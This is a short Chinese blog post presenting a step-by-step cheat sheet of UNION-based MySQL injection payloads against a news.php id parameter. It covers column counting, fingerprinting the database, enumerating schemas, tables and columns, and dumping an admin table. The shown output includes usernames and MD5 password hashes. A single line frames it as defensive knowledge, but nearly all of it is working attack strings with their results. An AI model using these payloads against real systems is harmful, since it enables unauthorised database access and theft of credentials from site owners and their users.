Mysql注入常用语句

发布时间:2016-03-25 浏览次数:3435 文章来源:个人博客

整一下常用sql注入的语句,了解注入语句的形式,才能更好的保证数据库的安全。

(1)猜解当前网页的字段数

news.php?id=228 order by 6
news.php?id=228 order by 7

Order by 6显示正常 ;order 7 显示不正常。说明字段数为6



(2)爆出数据库的基本信息。

news.php?id=228 and 1=2 union select 1,2,3,concat(user(),0x20,database(),0x20,version()),5,6

用户:people@localhost 数据库名:people 版本:5.0.20a-log



(3)爆出所有的数据库

news.php?id=228 and 1=2 union select 1,2,3,group_concat(distinct+table_schema),5,6 from+information_schema.columns

爆出数据库名:information_schema,people,test



(4)根据数据库表进行爆出所有数据库的表名

news.php?id=228 and 1=2 union 
select 1,2,3,group_concat(distinct+table_name),5,6 from+information_schema.tables where table_schema=database()

表名:admin1,answer,check,class,news,system,zhaoping



(5)爆出字段名

把admin1进行hex(16进制)的结果为:0x61646D696E31

news.php?id=228 and 1=2 union
 select 1,2,3,group_concat(distinct+column_name),5,6 from+information_schema.columns where table_name=0x61646D696E31

字段为:id,admin,password,rank


(6)爆出 admin和password里的值

news.php?id=228 and 1=2 union select 1,2,3,group_concat(distinct+id,0x2b,admin,0x2b,password,0x2b,rank),5,6 from admin1

值:1+admin+e10adc3949ba59abbe56e057f20f883e+0,
  2+87046609+e10adc3949ba59abbe56e057f20f883e+1,

  3+87046607+14a026642666897df2fcdcfe821af855+2,

key-word
sql注入语句 sql常用注入语句 sql注入 sql通用语句